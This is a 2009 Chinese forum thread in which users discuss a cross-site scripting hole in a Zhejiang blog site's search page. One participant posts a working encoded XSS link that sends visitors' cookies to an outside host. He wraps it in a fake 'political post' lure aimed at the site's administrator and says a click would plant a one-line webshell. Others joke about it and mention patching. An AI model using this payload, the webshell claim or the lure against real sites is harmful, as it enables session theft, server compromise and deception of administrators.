刚找到的浙江博客x s s

马之甲 · 发表于 2009-6-15 22:35

%@24 其实我觉得这个漏洞不会有太多危害。因为你获取的是你自己的cookie
你想获得我的cookie 你就得让我输入这么一个怪异的 url才行

所以天涯现在很忙，没空鸟你。

kucoolzhu · 发表于 2009-6-15 22:40

我可以这样。

天涯。。刚在博客区看到有人发政治贴！！！
附传送门

http://www.zjblog.com/list.asp?keyword=3E%3Cscript%3Edocument.location22http2F%2Ftest110.kkgg.net%2Fdocuments.php3D2Bdocument.cookie3C%2Fscript%3E

复制代码

你猜他会不会点呢，这个还只是半加密的地址而已

马之甲 · 发表于 2009-6-15 22:41

%@47 我觉得他会点的

kucoolzhu · 发表于 2009-6-15 22:42

而且论坛有个缺点就是链接不会完全显示，你觉得上面的链接有问题么？
按照我的推测。只要他一点，HSBBS论坛下面就会生成一个help.php 内容是一句话小马
因为我刚发现两个网站的cookie貌似有共通的地方

kucoolzhu · 发表于 2009-6-15 22:44

上面这个地址管理员记得别点啊。。。都配置好了%@08
如果存在漏洞的话真会有help.php的

马之甲 · 发表于 2009-6-15 22:44

%@58 我已经点了好几次了。。可惜我不当管理员好多年%@59

kucoolzhu · 发表于 2009-6-15 22:45

原帖由 马之甲 于 2009-6-15 22:44 发表
%@58 我已经点了好几次了。。可惜我不当管理员好多年%@59

%@51 %@51

OUT

马之甲 · 发表于 2009-6-15 22:46

不过我个人很不喜欢所谓“社会科学”的黑客技术。
背离黑客初衷。。。
不过这漏洞还是要补一补的啦，也就多加一句话而已，等天涯有空叫他补补。

马之甲 · 发表于 2009-6-15 22:46

%@53 忘记了我浙博还是管理员的。。。不过我没登陆%@55

天涯海角 · 发表于 2009-6-15 22:47

奇怪了我关闭了list.asp的keyword参数了

咋还会x s s取得当前的cookies呢

kucoolzhu · 发表于 2009-6-15 22:47

社会科学？社会工程学？
嗯嗯，漏洞要补，肉体上的那什么也别忘了%@58

马之甲 · 发表于 2009-6-15 22:48

因为他关闭了一次

kucoolzhu · 发表于 2009-6-15 22:48

吓我。。。居然出现了%@17

马之甲 · 发表于 2009-6-15 22:48

给你那菊花洞补补%@58

kucoolzhu · 发表于 2009-6-15 22:50

天涯。。点下那地址试试。。。%@23
我真的很想试试这个所谓的通杀Discuz 5.x 6.x 7.x EXP--database x s s有用不。。。。%@06

帐号		自动登录	找回密码
密码			会员注册

回复 56楼 kucoolzhu 的帖子